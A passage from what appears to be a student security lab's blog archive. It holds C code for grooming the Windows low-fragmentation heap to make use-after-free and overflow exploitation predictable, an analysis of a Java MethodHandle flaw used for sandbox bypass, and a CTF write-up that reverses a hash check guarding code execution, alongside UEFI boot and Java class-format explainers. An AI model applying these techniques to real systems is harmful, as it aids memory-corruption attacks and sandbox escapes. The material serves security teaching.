#include <Windows.h> #include <stdio.h> #include <iostream> int main() { HANDLE hHeap = GetProcessHeap(); char c; int i = 0; int size = 0x40; LPVOID chunk; // activating the LFH for the size we choose while (i < 0x10) { chunk = HeapAlloc(hHeap, 0, size); i++; } // making the allocation we want chunk = HeapAlloc(hHeap, 0, size); printf("chunk: %p\n", chunk); HeapFree(hHeap, 0, chunk); // making 0xff allocation for getting back // to the same point in the RtlpLowFragHeapRandomData i = 0; while (i < 0x100 - 1) { chunk = HeapAlloc(hHeap, 0, size); HeapFree(hHeap, 0, chunk); i++; } // reallocating : we get the same chunk chunk = HeapAlloc(hHeap, 0, size); printf("chunk: %p\n", chunk); }
So even if we don’t know where the allocation took place we get back to our first result with twice the same chunk:
chunk: 012A9A40 chunk: 012A9A40
This is really good for a use-after-free and we don’t have to fill all the space in the userblock. What about the overflow ? If we don’t free the chunk, after 0xff allocations, we will get back to the same point in the array, but this chunk will already be in use. At that point the allocation algorithm doesn’t take an other random number and keep trying, it will just take the first next free chunk which follow:
- First we activate the LFH
- Then we allocate the vulnerable chunk
- We allocate 0xff chunks
- We allocate the chunk we want to overflow
It will give us the following code:
#include <Windows.h> #include <stdio.h> #include <iostream> int main() { HANDLE hHeap = GetProcessHeap(); char c; int i = 0; int size = 0x40; LPVOID chunk; // activating the LFH for the size we choose while (i < 0x10) { chunk = HeapAlloc(hHeap, 0, size); i++; } // making the allocation which is vulnerable chunk = HeapAlloc(hHeap, 0, size); printf("vulnerable chunk: %p\n", chunk); // making 0xff allocation for getting back // to the same point in the RtlpLowFragHeapRandomData i = 0; while (i < 0x100 - 1) { chunk = HeapAlloc(hHeap, 0, size); HeapFree(hHeap, 0, chunk); i++; } // allocation we want to overwrite chunk = HeapAlloc(hHeap, 0, size); printf("chunk to overwrite: %p\n", chunk); }
Which will give us the result:
vulnerable chunk: 00559B20 chunk to overwrite: 00559B68
As you can see, the two chunks are 0x48 bytes apart: 0x40 bytes of user data followed by a gap of 8 bytes. Those 8 bytes are the size of the _HEAP_ENTRY struct, which contains the metadata of our block.
One of the biggest advantages of this technique is that we only need one chunk to overwrite, and we know which one it is.
Conclusion
We have seen two ways of getting some determinism from the LFH. Neither of those solutions is perfect. Exploiting a use-after-free with this technique will not be much harder than before if we can do some heap spraying. Overflows are not that easy: even with the second solution we still have a chance of getting the last chunk, and our two blocks can be separated by another allocated block. The best way of decreasing the risk of this happening is to first fill a subsegment and then use the new one to trigger the overflow.
UEFI boot stub in Linux
As most of you know, the linux kernel is stored as a bzImage. This bzImage has been comprised of different files over the time, but it is usually the composition of two things:
The bit that interests us is the linux boot code, and how it paves the way for the kernel itself. You may consider that once the piggy.o (see later) object has been loaded at offset 0x100000, the basic bootloading job is done. But first, before tackling UEFI thematics, let’s go back a bit to the legacy booting processes.
I gave a conference about these matters in March. You can consult the slides at the following address. The prezi slides give a very good idea of where you are in the code, try it!
Legacy boot
Way, way back in 2.5.64
Even before people used window managers and all that fancy stuff, linux actually was a bootable image, meaning you could run
dd if=bzImage of=/dev/sda
and just boot off the thing. This required the first 512 bytes to be MBR material, able to load the rest of the kernel itself. Using this technique, it was not possible to easily specify a command-line (and therefore a root filesystem, an initrd file or an init binary). The bzImage was composed as follows:
The piggy.o object contains the bulk of the kernel image. misc.o is a bunch of gzip routines for the decompression of the kernel.
The bootsect.o was a 512-bytes MBR. Since 2.5.65, it just prints an error message indicating that the feature is not supported anymore. arch/i386/boot has since 2.6.24 been moved into arch/x86/boot. bootsect.S and setup.S have been replaced by the header.S file since 2.6.23. The bootsect.S file performed only a few basic tasks:
- Relocated itself at address 0x9000 (bootsect.S:62)
- Loaded the setup.o code at address 0x9200 (bootsect.S:153).
- Loaded the system at address 0x100000 (bootsect.S:225)
The size of the setup.o code, which needs to be loaded in low-memory, is defined in the setup_sects field (bootsect.S:415).
After loading those two chunks in memory, the processor jumped into the setup.o code, at the symbol start_of_setup (setup.S:173). From here, it carried out a few tasks:
- Checked the memory layout with three different methods (e820h, e801h and 88h)
- Jumped in protected mode (setup.S:873) at offset 0x100000 (setup.S:905).
The code at 0x100000 (1 MiB) is part of the startup_32 (head.S:31) routine, the first protected-mode code in the kernel. It uses routines from misc.c to decompress the kernel in place and then jumps again to 0x100000 (head.S:77), where the code from piggy.o has now been loaded.
The real world
As I previously said, the layout of the arch/i386/boot folder (as of today arch/x86/boot) changed drastically over the time.
The first change to take place was the nullification of the MBR, and starting at version 2.5.65, the 512 first bytes were only able to print out a bugger-off message. Between versions 2.6.22 and 2.6.23, the folder was totally revisited. A new file header.S was created, containing the now useless 512 bytes MBR and a bit of the setup.S code as well. The main change remains in the creation of a main.c file executing most of the initializations performed by the old setup.S regarding the BIOS mode, the memory detection, the video mode and such. The code in the main.c file then jumps in protected mode in the pm.c file (pm.c:149) via the goto_protected_mode stub. The head_32.S file is still very similar to the original head.S source: its job is to decompress the kernel in-place, thus placing piggy.o at 0x100000.
The bzImage is of the following composition according to my research and the compressed folder building files (Makefile:29 and vmlinux.lds.S):
Usual BIOS-enabled bootloaders startup
Let’s take a look at the syslinux sources to understand when and how the linux bzImage is loaded in memory by the bootloader itself. A big thanks to the guys from #syslinux on freenode for their help in finding the module loading and jumping into the kernel linux, the path was not obvious. It is split in two according to the setup_sects header (load_linux.c:243) in the first 512 bytes of the header.o file (header.S:264).
- The realmode code is loaded at an offset below 1M (load_linux.c:320)
- The command-line is loaded right behind this code (load_linux.c:344)
- The vmlinux.bin.gz file is loaded above 1M (load_linux.c:362)
Once this is done, the bootloader simply jumps 512 bytes past the beginning of the real-mode code it copied into memory. This code will relocate itself to offset 0x9000 according to the setup_move_size field (header.S:306) if the command-line address has not been specified in the command_line_ptr field (header.S:338). From then on, the kernel will follow the same route as when it was loaded as an image.
It might also be interesting to specify that the setup segment of the bootloading process is aware of the bootloader that loaded it previously thanks to the ext_loader_type field (header.S:335) (boot.txt:).
Conclusion
Well, all we have learned thus far is that the BIOS-dependent bootloading process for linux is quite a mess. It is not trivial to follow the control flow and the bzImage loading is far from obvious. The drastic changes the boot folder underwent did not help me get a sense of what was going on. However, here comes UEFI.
The UEFI model
Introduction
The goal of the UEFI specification is first to unify the boot process and get rid of the mess the BIOS-dependent bootloading option is. When the IA64 architecture was designed, engineers from Intel thought it was time to get rid of the legacy 16bits to 32bits to 64bits booting process, and go straight into protected mode. However, as the IA64 architecture failed in favor of the AMD64, the idea of getting rid of the archaic firmware that is BIOS stuck, and after a few years, the EFI firmware became UEFI and development of this specification spread outside Intel.
The idea here is to provide a more programmer-friendly API, with simple applications packaged as Portable Executables (the PE format from Windows). Most of these applications are services (usually drivers) exposing a bunch of devices to the user, such as a keyboard, a screen or the clock. They are initialized and run automatically by the firmware. Other applications include a shell (enabling the user to start other applications), or bootloaders (which might be useful).
There are three types of application:
- Simple applications (type=10)
- Boot services (type=11)
- Runtime services (type=12)
Boot services are protocols (API to stay simple) designed to die when the boot process is done and the control is handed to the OS (via the
ExitBootServices()
routine.) These services include drivers such as text/graphical console, block devices and such. On the other hand, Runtime services are designed to stay reachable by the OS, even after a call to ExitBootServices()
. These services provide access to the NvRAM for example, or drivers for the clock. The NvRAM stores a few variables, including the configuration for the boot manager. This boot manager reads the NvRAM to boot on a given application automatically. This configuration is alterable via the
efibootmgr
utility and allows the user to set up the bootloader order. This order usually defaults to:
- Try to boot on floppy
- Try to boot on hard drive
- Try to boot on NIC0
- Run shell application
The user-defined applications and files are stored on a special
fat32
partition defined by the identifier 0xEF
.
UEFI: how to
As specified before, the code for an application is encapsulated in the PE format. This means the binary needs both the MZ and PE headers in order to be recognized as a valid efi executable. It needs to feature the .efi extension in the filesystem as well.
The compilation of such binaries can be achieved with the help of the gnu-efi library, whose headers expose to the user the firmware-provided data structures and function prototypes, such as the main entry point. It also includes a basic C I/O library using the EFI-defined drivers to access the peripherals.
The main prototype as defined by the gnu-efi library (ia32/efibind.h:250), and used in a sample ‘hello world’ application (apps/t.c:16):
EFI_STATUS efi_main (EFI_HANDLE image_handle, EFI_SYSTEM_TABLE *systab);
Arriving in that main, all the EFI features are available via the EFI_SYSTEM_TABLE (efiapi.h:866) structure. The firmware thus exposes directly an stdin/stdout/stderr via the
systab->{ConIn,ConOut,StdErr}
handles.The EFI_BOOT_SERVICES structure gives a reference to the different protocols and drivers to the user via the
LocateHandle()
andLocateProtocol()
functions. The EFI_RUNTIME_SERVICES structure yields directly access to the time and NvRAM variables.Booting without a bootloader: the EFI boot stub
As expected, the linux kernel obviously does not use the gnu-efi library. The idea behind the EFI boot stub is to fake the previously seen bzImage as a valid efi application. This means setting up a MZ+PE header and all kinds of sneaky, sneaky stuff.
The EFI boot stub became available as of linux 3.3. When compiling the kernel with options
CONFIG_EFI_STUB=y
, the header.S image features made up MZ+PE headers. The most important field, the AddressEntryPoint (header.S:144) is named efi_pe_entry in the source tree and is set by the tools/build.c program to either of the following (tools/build.c:274):- 0x010 (compressed/head_64.S:37) or (compressed/head_32:34). In the case of the head_64.S file, the EFI entry point is set to the 64 bits entry each time. However, a legacy bootloader will jump at 0x100000 and fall on the 32 bits entry which will do the jump into long mode and fall through in the (startup_64) routine. 64 bits legacy bootloader, however, will know enough to jump directly into startup_64.
- 0x210 (compressed/head_64.S:191).
The remaining problem here is that bootloaders usually provide a boot_params data structure. Here, the head_{32,64}.S files use a make_boot_params function (compressed/eboot.c:693) (compressed/head_64.S:214) (compressed/head_32.S:45) in order to setup this structure.
The processor then enters the efi_stub_entry, (compressed/head_64.S:221) (compressed/head_32.S:55) the offset of which also depends on the architecture adopted by the kernel (ia32 or amd64). As implemented since the boot protocol 2.11 (boot.txt:57) (boot.txt:1097), the kernel supports EFI handover, meaning bootloaders can yield the remainder of the boot process to the EFI boot stub. This is where efi_stub_entry intervenes, representing that entry point and being stored in the handover_offset (header.S:422) (boot.txt:728) if the xloadflags (header.S:371) is set accordingly (boot.txt:590).
The code beginning from the efi_stub_entry first calls efi_main (compressed/eboot.c:748) (not to be mistaken with the gnu-efi efi_main we talked about earlier,) which executes a basic initialization:
- Test if called by the UEFI firmware (might be called with efi_stub_entry as entry point.) Fail if not.
- Call to setup_graphics.
- Call to setup_efi_pci, which retrieves the main pci_handle (compressed/eboot.c:65) and fetches each individual device handle (compressed/eboot.c:85).
- Relocate the kernel code at the preferred address (compressed/eboot.c:783)
- Load the dummy GDT and disable interrupts (compressed/eboot.c:857).
- Performs the call to
ExitBootServices()
needed for the firmware to let go of the control (compressed/eboot.c:800) (compressed/eboot.c:710).
After exiting efi_main successfully, the processor just jumps in the newly relocated kernel, according to the values in the boot_params (asm/bootparams.h:111) structure, stored in %eax at exit (compressed/head_64.S:233).
LSE Week 2014: Schedule
Our schedule for the LSE Week 2014 is out !
The schedule will be as follow:
- July, Thursday the 17th in the evening
- July, Friday the 18th in the evening
- July, Saturday the 19th all day long
The complete schedule is available on the page dedicated to the event
Lightning Talks Tuesday 13 2014
As you might have already noticed, this month’s lightning talks will take place on the 13th, meaning the second Tuesday of the month. This will be the case each month from now on for logistical reasons.
The program will be as follow:
- Heartbleed, technical overview by Bruno Pujos. Abstract: An explanation of the Heartbeat extension and how the Heartbleed bug is working, what kind of information can leak from it, and why it has not been found earlier.
- Anti-Virtual Machine Techniques by Pierre Rovis. Abstract: An overview of some of the techniques being used by malwares to recognize virtual machine environments, how they work and what they are detecting.
Those conferences will take place in IP 11 from 7:30 PM.
LSE Week 2014 announcement
For the fourth year, we are going to give 3 days of talks to show the work we are doing here at the LSE, about various themes we like, have encountered or overall judge interesting.
The schedule will be as follow:
- July, Thursday the 17th in the evening
- July, Friday the 18th in the evening
- July, Saturday the 19th all day long
The exact planning and subjects addressed will be announced later, as well as the exact timetable. As we did last year, we are also opening the talks to external contributors and all LSE members, present or past.
The presentations will be held in French as usual and we will try to record everything.
If you want to propose a talk, you can contact us at contact@lse.epita.fr or on #lse@rezosup. The deadline for submitting content is June 8.
Issue 54 in Java
Introduction
One of the quite recent (at least, not too old) and amusing things to look at when you are beginning to study security in Java is issue 54 from Security Explorations. This issue is quite interesting, because it is a low-level trick and is, so far, not patched.
Security in java
Before talking about this particular issue, let’s see some basics about security in Java in general.
The first thing to know is what and why are we attacking java? Java is designed to run code from untrusted sources securely. This is a well known property and you can find it “everyday” in your browser with the java applets. When an applet is downloaded from a website the browser will run it and you don’t want a potentially malicious attacker to have full permissions under your machine.
Java implements a system of permissions to limit possibilities for the code executed with unprivileged rights (the applet). The goal for an attacker will be to acquire full privileges from an unprivileged application, allowing full compromise of the computer. The traditional attacks (overflow, use-after-free…) still work, but there is an additional type which is less common: the sandbox bypass (which can itself be divided into several categories: unsafe reflection, least privilege violation…).
The security of Java is based on several things. The first is memory management, which is handled by the JVM (Java Virtual Machine) and not by the user. This avoids most of the stupid errors developers can make, but it is also mandatory for running code safely (if we can do what we want with the memory, we already have the same privileges as the program).
The second part of the security is handled at the loading of a class. This loading process is divided into two parts: the class loader and the bytecode verifier.
The class loader has a similar goal as the dynamic linker in Unix systems. There are several implementations (classes) of the class loader, like the applet class loader which can load code over the internet from a website. All class loaders inherit from
java.lang.ClassLoader
. Of course, a class loader has to take some precautions not to execute malicious code. In particular, it will have to check that we are not trying to spoof a System class which would allow us to bypass all security protections.During the validation step by the class loader, the bytecode will be checked by the bytecode verifier. It is called from the class loader through the method
defineClass
. It will not perform any check of logic but only check that the bytecode is valid and other various things, for example that it is not overflowing the stack. Once the bytecode verifier has done his work, if the class loader validates the class, the code is considered to be of no harm to the JVM (this doesn’t mean you have all the privileges).The last important part in java security is the security manager, it’s the part which will check all the permissions during runtime. If unprivileged code tries to do something forbidden, it will raise an exception. The basic class for the security manager is
java.lang.SecurityManager
Usually, the security manager will be retrieved by a call togetSecurityManager
(java.lang.System
).If the security manager is set to
null
, no check is performed and the code runs with full privileges. Therefore, the goal of a lot of exploits will be to rewrite the security manager tonull
. Some permissions allow to change the security manager and to set it tonull
(AllPermission
,setSecurityManager
,createClassLoader
,accessClassInPackage.sun
…). Typically, a permission check looks like this:::java // From AppletClassLoader.java SecurityManager sm = System.getSecurityManager(); if (sm != null) sm.checkPackageAccess(name.substring(0, i));
The method
checkPackageAccess
and all the other check functions will throw an error if the code doesn’t have the rights to perform the action desired. The check walks the call stack and, if it finds an unprivileged function, it throws an exception. To go from unprivileged code to privileged code, Java uses the AccessController.doPrivileged
method:::java AccessController.doPrivileged(new PrivilegedAction() { public Object run() { // insert priviledge code here } });
This check is performed by the security manager and will stop at the first doPrivileged it finds.
The MethodHandle resolution mechanism
In the constant pool of a class file it is possible to define a
MethodHandle
. This entry in the constant pool contains two elements: the reference kind and the reference index. The reference kind characterizes the bytecode behavior of the methodhandle, there are 9 possible kinds, as follow:REF_getField REF_getStatic REF_putField REF_putStatic REF_invokeVirtual REF_invokeStatic REF_invokeSpecial REF_newInvokeSpecial REF_invokeInterface
All 9 kinds are used to get a
MethodHandle
. This object can reference not only methods but also fields, constructors “and similar low-level operations”. The kinds 1 to 4 are used to create aMethodHandle
on a field and the reference index must point to aCONSTANT_Fieldref
. For kinds 5 to 8 the reference index must point to aCONSTANT_Methodref
. It is used to get aMethodHandle
on a method.The last kind (
REF_invokeInterface
) is used forCONSTANT_InterfaceMethodref
and returns aMethodHandle
for an interface method. The interesting part about the use of aCONSTANT_MethodHandle
into the constant pool is that the creation of theMethodHandle
is done at the loading of the class file. Theoretically, it should make no difference between retrieving theMethodHandle
at the loading of the class and after the loading. We will see that it’s not the case.Issue 54: the vulnerability
Issue 54 was found by Security Explorations and is well documented (http://www.security-explorations.com/materials/se-2012-01-54.pdf). The usual way to get a MethodHandle for a method of a class is to call the public method
findVirtual
from theMethodHandles.Lookup
module. The code of this method is the following:::java public MethodHandle findVirtual(Class<?> refc, String name, MethodType type) throws NoSuchMethodException, IllegalAccessException { MemberName method = resolveOrFail(refc, name, type, false); checkSecurityManager(refc, method); return accessVirtual(refc, method); }
In this code we can see the call to the method
checkSecurityManager
which checks whether the calling code has the right to get theMethodHandle
. In particular, it will forbid to get aMethodHandle
on a private method of a super-class. On the other hand, when getting a MethodHandle at class loading with aREF_invokeVirtual
, the method called isresolveVirtual
:::java private MethodHandle resolveVirtual(Class<?> refc, String name, MethodType type) throws NoSuchMethodException, IllegalAccessException { MemberName method = resolveOrFail(refc, name, type, false); return accessVirtual(refc, method); }
We can see that the only difference between these two functions is the call to the
checkSecurityManager
function which is not done in theresolveVirtual
method. TheresolveVirtual
function is of course private but during loading it is called by the class loader. That means that a specially crafted class can get virtual and static methods (the same issue exists with findStatic and resolveStatic) from a class, allowing to have a validMethodHandle
on something we shouldn’t have had access to.This issue is also present in most of the different kinds of
CONSTANT_MethodHandle
entries in the constant pool of a class file. Still, this issue alone does not allow code from an untrusted source to be executed as privileged. When Security Explorations reported that vulnerability, they used a second one (Issue 55 http://www.security-explorations.com/materials/SE-2012-01-ORACLE-10.pdf) to get code executed as privileged. Issue 55 allows binding a MethodHandle
to an object instance of an incompatible type. This could allow setting the security manager to null, bypassing all the permission checks.
Issue 54: the exploitation
Along with this issue, Security Explorations released a demonstration of issues 54 and 55 (http://www.security-explorations.com/materials/se-2012-01-50-60.zip). In particular, it contains a class
MyCL.class
which is “hand made”, and contains the exploitation of issue 54. Here is the constant pool of this class:::java CONSTANT_MethodRef(10) 5, 16 CONSTANT_MethodRef(10) 5, 17 CONSTANT_String(8) 10 CONSTANT_Class(7) 18 CONSTANT_Class(7) 19 CONSTANT_Utf8(1) 6 : <init> CONSTANT_Utf8(1) 3 : ()V CONSTANT_Utf8(1) 4 : Code CONSTANT_Utf8(1) 15 : LineNumberTable CONSTANT_Utf8(1) 5 : dummy CONSTANT_Utf8(1) 57 : (Ljava/lang/String;[BIILjava/security/ProtectionDomain;)V CONSTANT_Utf8(1) 18 : get_defineClass_mh CONSTANT_Utf8(1) 20 : ()Ljava/lang/Object; CONSTANT_Utf8(1) 10 : SourceFile CONSTANT_Utf8(1) 9 : MyCL.java CONSTANT_NameAndType(12) 6, 7 CONSTANT_NameAndType(12) 20, 21 CONSTANT_Utf8(1) 4 : MyCL CONSTANT_Utf8(1) 21 : java/lang/ClassLoader CONSTANT_Utf8(1) 11 : defineClass CONSTANT_Utf8(1) 73 : (Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class; CONSTANT_MethodHandle(15) REF_invokeVirtual(5), 2
We can see that the entry 22 is a
CONSTANT_MethodHandle1
with the kindREF_invokeVirtual
for exploiting the vulnerability and refer to theCONSTANT_MethodRef
at the entry 2, which is in the class java.lang.ClassLoader the methoddefineClass
.The
defineClass
method injava.lang.ClassLoader
is a protected final method, so it should be impossible to obtain a handle on this method and, obviously, to call it. In
MyCL.class
we have three methods :<init>
which is for the initialisationdummy
get_defineClass_mh
which returns theCONSTANT_MethodHandle
at the entry 22 of the constant pool.
The other part of the exploit is for the issue 55 which will allow to bind the method handle to another class and get it called with privileged rights, allowing a sandbox bypass.
Conclusion
This issue, even if a little old, is really interesting because it sheds light on some internals of the class loading process which are often unclear. It is also really disturbing because Oracle doesn’t seem to consider this issue a problem, indicating that this was an “allowed behavior”. Still not patched, this issue can be used for developing exploits, widening the possibilities for finding vulnerabilities. Even if this issue was basically focused on a MethodHandle pointing to a method, the same problem exists with a MethodHandle pointing to a field, allowing an attacker to gain even more access.
0xCAFEBABE ? - java class file format, an overview
Lately, we’ve been having a look into Java. First, we tried to understand the file format. A Java application is often shipped as a .jar, which is basically a zip archive (you can also find .war files, which are also zip archives). Inside this archive you’ll find several files, especially some .class files, which are the ones containing the Java bytecode. Those files are the ones we’ll look into.
The file begins with a header including the magic number (
0xCAFEBABE
), the minor version which is 0 and the major version for Java SE 7:0x0033
(51.00). All numbers in the class file are stored in big-endian order. Right after that header, we find the constant pool count, which is the number of entries in the constant pool table plus one, and then the table itself. There are several kinds of entries representing several items in the constant pool, like constants, classes, etc. After that, there are the access flags of the class, the
this_class
andsuper_class
identifiers which are indices in the constant pool in order to refer to the current class and the super class. This is followed by the interface table and its size; the table contains all the interfaces which the current class implements. Then we find the field table and its size, followed by the methods and the attributes of the class. Here is mainly an overview of the class file.
Constant Pool
The constant pool is probably the most important part of the Class file. It contains all the information that will be needed on the other part of the file. The constant pool is an array containing several entries, the index of the array starts at 1, not 0. The different structures in the table do not have the same size, and so the constant pool may have a variable size. Each entry begins with a tag on one byte, indicating the type of entry:
-
CONSTANT_Utf8
: indicating an utf8 modified entry. Java uses a particular type of utf8 for representing the constant string values. -
CONSTANT_Integer
: representing a constant integer on 4 bytes, just like everything in the class file format the integer is a big-endian. -
CONSTANT_Float
: representing a float on 4 bytes, it follows the IEEE 754 floating point format, with possibility of representing both infinity and NaN. -
CONSTANT_Long
: same asCONSTANT_Integer
but represents the integer on 8 bytes. Something particular about this entry is that it counts for two entries in the constant pool’s number of entries. -
CONSTANT_Double
: asCONSTANT_Float
it follows the IEEE 754 for the double format, likeCONSTANT_Long
it stores the number on 8 bytes and also counts twice in the constant pool. -
CONSTANT_Class
: this one is used to represent a class or an interface; it has only one characteristic, which is an index in the constant pool to a CONSTANT_Utf8
indicating the name of the class. -
CONSTANT_String
: its goal is to represent constant object of string type. likeCONSTANT_Class
, it only contains one information which is the index of aCONSTANT_Utf8
in the constant pool to represent the string’s value. -
CONSTANT_Fieldref
: this represents a reference to a field. it contains the index ofCONSTANT_Class
to represent the class or interface in which the field is and the index of aCONSTANT_NameAndType
(see below) for representing the name and the field’s type. (http://docs.oracle.com/javase/specs/jvms/se7/html/jvms-4.html#jvms-4.3.2). -
CONSTANT_Methodref
: likeCONSTANT_Fieldref
, it contains aCONSTANT_Class
index and aCONSTANT_NameAndType
. TheCONSTANT_Class
must represent a class and not an interface. TheCONSTANT_NameAndType
must represent a method descriptor (http://docs.oracle.com/javase/specs/jvms/se7/html/jvms-4.html#jvms-4.3.3). -
CONSTANT_InterfaceMethodref
: it is similar to theCONSTANT_Methodref
type except that theCONSTANT_Class
entry must represent an interface. -
CONSTANT_NameAndType
: this structure is used to represent a field or method without indicating the class or interface it belongs to, it contains two indices in the constant pool which must have the typeCONSTANT_Utf8
, the first represents the name and the other one represents a valid descriptor of the field or the method. -
CONSTANT_MethodHandle
: this field is used to resolve symbolic reference to a method handle. The way of resolving a method depends on something called the bytecode behavior which is indicated by a kind indicator (from 1 to 9). It also contains a reference on two bytes which is an index in the constant pool pointing on aCONSTANT_Fieldref
,CONSTANT_Methodref
orCONSTANT_InterfaceMethodref
depending on the kind. -
CONSTANT_MethodType
: this field is used to resolve the method’s type, it contains an index to aCONSTANT_Utf8
which should represent the method’s type. -
CONSTANT_InvokeDynamic
: this structure is used by the invokedynamic instruction to specify a bootstrap method. It contains an index into the bootstrap method table (see attributes below) and an index into the constant pool to aCONSTANT_NameAndType
representing the method name and method descriptor.
Here is a global overview of each of those structures:
General and Interfaces
After the Constant Pool, we can find several pieces of information about the current class: the class name and the superclass. There is also general information about the class in the access flags. There are several access flag types for classes, fields and methods. The different kinds of access flags are:
After the general information field, there is an information field about the interfaces. All the interfaces the class implements are represented in the interface table. Each entry in that table is a constant pool index representing a
CONSTANT_Class
which must be an interface.Attributes
Each field, method and class has other characteristics and information. This information is contained inside attributes. There are several attribute types, each of which can be applied to one or several fields, methods, classes and codes. The attributes are used to represent:
- Code
- Local variables, constant value, information about the stack and exceptions
- Inner Classes, Bootstrap Methods, Enclosing methods
- Annotations
- Information for debug/decompilation
- Complementary information (Deprecated, Signature…)
Each attribute begins by an index into the constant pool, it must point to a
CONSTANT_Utf8
entry telling which type of attribute this is. Afterward, since the different types of attributes have different structures, the attribute length is indicated. An implementation of the Java Virtual Machine is not required to handle every kind of attribute, because knowing the length allows it to skip an unhandled attribute and still execute the file correctly. The most important attribute is probably the Code:
It begins with the common header, the attribute name index should point to a
CONSTANT_Utf8
representing the string"Code"
.It is followed by two variables: max stack and max locals which represent the stack size and the size of the local variables including the one used for passing arguments to methods. Then there is the code length and the code which is the bytecode that will be executed by the JVM when the method is called.
Right after that, you’ll find a table representing the exception handlers inside the function. Each entry indicates the start and the end of the zone where the exception should be caught, the start of the handler code executed if the exception is raised, and the catch type, which is an index to a
CONSTANT_Class
into the constant pool. The catch type can also be 0, in which case the handler is called for every exception; this is generally used for the finally statement. After the exceptions section, it is possible to add some attributes for the code, especially about the stack and the local variables. The Code is an attribute that may contain other attributes.
Fields & Methods
The fields and methods are added in two tables which contain the same elements. The access flags are different for the fields and methods since they are represented above.
After the flag section, we find the name which is an index to a
CONSTANT_Utf8
in the constant pool representing the name of the method/field. The descriptor index is also an index to aCONSTANT_Utf8
which represents a descriptor defining the method or field type.Finally, the method and field can have attributes, moreover a method will contain a code attribute which will contain itself the method code.
Conclusion
The class file is really important for the JVM and having a look at the file format explains a lot of things about the way the JVM works internally.
Recently Java SE 8 has been released, there are several small differences with Java SE 7 even though the major part of the class file has not changed. In particular, it defines new attributes :
RuntimeVisibleTypeAnnotations
,RuntimeInvisibleTypeAnnotations
andMethodParameters
.There are also several modifications in different sections changing the default behaviour of the JVM. It also adds precision and constraints to parts of the class file. The version number for Java SE 7 is 51.00 and 52.00 for Java SE 8.
We’ve written a parser of the class file format in Python3 that you can find here : java.py.
It uses the srddl module for python, available here : https://bitbucket.org/kushou/srddl
-
Lightning Talks Tuesday, 1st April
Here is the lightning talk program for the 1st April :
- Portable Executable: Overview of the executables files on Windows. by Jérémy Lefaure
- A first peek at asymmetric cryptography: The RSA cryptosystem. by Fabien Goncalves
- Introduction to Register Transfer Level: a simple way to design synchronous digital circuits. by Pierre Surply
- Analysing unknown data with python. by Rémi Audebert
Talks will start in amphi 4, at 19h30.
And here are the slides from last time :
Lightning Talks at EPITA, Tuesday, March 4th 2014
Every month, on the first Tuesday of the month, we will have a lightning talk session.
Last Month (February 11th) we had :
- Introduction to TI PRUSS by Pierre Surply - Slides
- PS/2 Archeology by Gabriel Laskar - Slides
- IDAPython walkthrough by Bruno Pujos
On Tuesday, we will have :
- Malloc Internals by Bruno Pujos
- vsyscall/vDSO by Adrien Schildknecht
- Qemu integrated testing: liqtest / libqos by Nassim Eddequiouaq
Talks will start in amphi 1, at 19h30.
Olympic-CTF 2014: zpwn (200 points)
This exercise was based on an IBM s/390 ELF running on a remote server which listens on UDP port 31337.
The first thing we did was to set up Hercules, an open source software implementation of the mainframe System/370 and ESA/390 architectures, to run a Linux distribution. After some tries with Debian and openSUSE, we finally succeeded in setting up Fedora 20 on this emulator.
Reversing ELF
At first sight, the binary seems to echo back the entire buffer sent by the client via UDP.
After disassembling it, we saw that the buffer is hashed and compared to a constant value: if the hash is equal to
0xfffcecc8
then the process jumps into the received buffer instead of sending it back./* Receive buffer via UDP */ 80000b26: a7 49 20 00 lghi %r4,8192 ; len 80000b2a: b9 04 00 2a lgr %r2,%r10 ; sockfd 80000b2e: b9 04 00 3b lgr %r3,%r11 ; buff 80000b32: a7 59 00 00 lghi %r5,0 ; flags 80000b36: b9 04 00 69 lgr %r6,%r9 ; src_addr 80000b3a: a7 18 00 10 lhi %r1,16 80000b3e: 50 10 f0 cc st %r1,204(%r15) 80000b42: c0 e5 ff ff fe 51 brasl %r14,800007e4 <recvfrom@plt> 80000b48: b9 14 00 42 lgfr %r4,%r2 80000b4c: b9 02 00 44 ltgr %r4,%r4 80000b50: a7 84 00 1d je 80000b8a 80000b54: b9 04 00 5b lgr %r5,%r11 80000b58: a7 28 ff ff lhi %r2,-1 80000b5c: b9 04 00 34 lgr %r3,%r4 /* Hash buffer */ 80000b60: 43 10 50 00 ic %r1,0(%r5) 80000b64: 41 50 50 01 la %r5,1(%r5) 80000b68: 17 12 xr %r1,%r2 80000b6a: 88 20 00 08 srl %r2,8 80000b6e: b9 84 00 11 llgcr %r1,%r1 80000b72: eb 11 00 02 00 0d sllg %r1,%r1,2 80000b78: 57 21 c0 00 x %r2,0(%r1,%r12) 80000b7c: a7 37 ff f2 brctg %r3,80000b60 80000b80: c2 2d ff fc ec c8 cfi %r2,-201528 ; Compare hash to 0xfffcecc8 80000b86: a7 84 00 14 je 80000bae /* Send buffer via UDP if hash(buffer) != 0x31eedfb4 */ 80000b8a: b9 04 00 2a lgr %r2,%r10 ; sockfd 80000b8e: b9 04 00 3b lgr %r3,%r11 ; buff 80000b92: a7 59 00 00 lghi %r5,0 ; flags 80000b96: b9 04 00 69 lgr %r6,%r9 ; dest_addr 80000b9a: a7 19 00 10 lghi %r1,16 80000b9e: e3 10 f0 a0 00 24 stg %r1,160(%r15) 80000ba4: c0 e5 ff ff fe 70 brasl %r14,80000884 <sendto@plt> 80000baa: a7 f4 ff bb j 80000b20 /* Jump into buffer if hash(buffer) == 0xfffcecc8 */ 80000bae: 0d eb basr %r14,%r11 80000bb0: a7 f4 ff b8 j 80000b20
Breaking the hash
When we look closer to the hash function, we can see that
%r2
register is initialized to0xffffffff
and then xored with some values located in.rodata
. Because%r2
is right shifted before eachxor
operation, it is easy to find the location of this data by applying a reversed version of this algorithm and analysing the most significant byte of each%r2
value.800010e0: ff 0f 6a 70 ^ ff fc ec c8 -------------- 00 f3 86 b8 ----\ | | srl 8 80000dc4: f3 b9 71 48 | ^ f3 86 b8 xx <-/ -------------- 00 3f c9 xx ----\ | | srl 8 80001014: 3f b5 06 dd | ^ 3f c9 xx xx <-/ -------------- 00 7c xx xx 800010b4: 7c dc ef b7
Then, we deduced that these values are located at
800010b4
,80001014
,80000dc4
and 800010e0
. We could now apply the right algorithm to get the real values of%r2
.(0xffffffff >> 8) ^ 0x7cdcefb7 = 0x7c231048 (0x7c231048 >> 8) ^ 0x3fb506dd = 0x3fc925cd (0x3fc925cd >> 8) ^ 0xf3b97148 = 0xf386b86d (0xf386b86d >> 8) ^ 0xff0f6a70 = 0xfffcecc8
